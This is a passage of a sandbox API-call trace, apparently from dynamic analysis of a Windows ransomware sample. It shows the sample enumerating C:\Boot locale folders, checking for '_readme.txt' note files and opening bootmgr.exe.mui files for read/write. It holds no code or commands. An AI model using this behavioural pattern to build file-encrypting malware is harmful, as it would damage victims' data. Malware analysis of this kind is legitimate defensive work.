nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.095] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.095] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175990 [0093.095] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.095] PathFindExtensionW (pszPath="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned=".mui" [0093.095] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.095] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175990 | out: hHeap=0x680000) returned 1 [0093.095] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3372840, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa3372840, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3372840, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0093.095] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.095] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175990 [0093.095] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.095] PathFindExtensionW (pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned=".txt" [0093.095] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175990 | out: hHeap=0x680000) returned 1 [0093.095] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3372840, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa3372840, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3372840, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0093.095] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0093.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef540 | out: hHeap=0x680000) returned 1 [0093.096] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0093.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef540 [0093.096] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0093.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f05a0 [0093.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.097] PathFindFileNameW (pszPath="C:\\Boot\\nb-NO\\") returned="nb-NO\\" [0093.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.097] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0093.097] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.097] PathFindFileNameW (pszPath="") returned="" [0093.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.097] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0093.097] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0093.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x800) returned 0x31d1120 [0093.097] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0093.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99c9c68 [0093.098] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.098] FreeLibrary (hLibModule=0x75670000) returned 1 [0093.098] PathAppendW (in: pszPath="C:\\Boot\\nb-NO\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 1 [0093.098] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.098] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.098] PathFileExistsW (pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 1 [0093.098] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.098] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.098] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3372840, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3372840, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0093.098] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.098] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3372840, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3372840, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.098] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.098] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.098] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0093.098] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.098] PathFindExtensionW (pszPath="C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned=".mui" [0093.098] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.098] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31758b8 | out: hHeap=0x680000) returned 1 [0093.098] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3372840, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa3372840, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3372840, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0093.098] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0093.099] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.099] PathFindExtensionW (pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned=".txt" [0093.099] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31758b8 | out: hHeap=0x680000) returned 1 [0093.099] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3372840, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa3372840, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3372840, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0093.099] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0093.099] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.099] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef540 | out: hHeap=0x680000) returned 1 [0093.099] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0093.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef540 [0093.099] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0093.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.099] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.099] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.099] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.099] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.099] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.099] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.099] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.100] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.100] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.100] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.100] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.100] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.100] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.100] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f05a0 [0093.101] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.101] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.101] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.101] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.102] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.102] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.104] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.104] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.104] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.104] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.104] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.104] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.104] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f05a0 [0093.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.104] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.104] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.104] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.104] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.104] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.104] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.104] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.105] HeapFree (in: hHeap=0x680000, dwFlags=0x0, 